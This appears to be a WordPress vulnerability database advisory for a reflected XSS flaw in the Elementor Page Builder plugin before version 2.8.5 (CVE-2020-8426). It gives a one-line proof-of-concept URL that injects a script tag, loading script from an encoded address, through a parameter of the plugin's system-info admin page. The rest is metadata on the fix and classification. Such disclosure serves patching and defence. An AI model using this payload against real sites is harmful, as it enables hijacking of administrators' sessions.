Elementor Page Builder < 2.8.5 - Authenticated Reflected XSS



Proof of Concept
/wp-admin/admin.php?page=elementor-system-info&lndan%22%3e%3cscript%0csrc%3d//0x7f000001%3e%3c/script%3e=1

Affects Plugin

fixed in version 2.8.5

References

CVE 2020-8426
URL https://blog.impenetrable.tech/xss-in-wordpress-elementor-plugin

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 9995
Verified No
WPVDB ID 10051

Timeline

Publicly Published 2020-01-29 (4 months ago)
Added 2020-01-29 (4 months ago)
Last Updated 2020-01-30 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin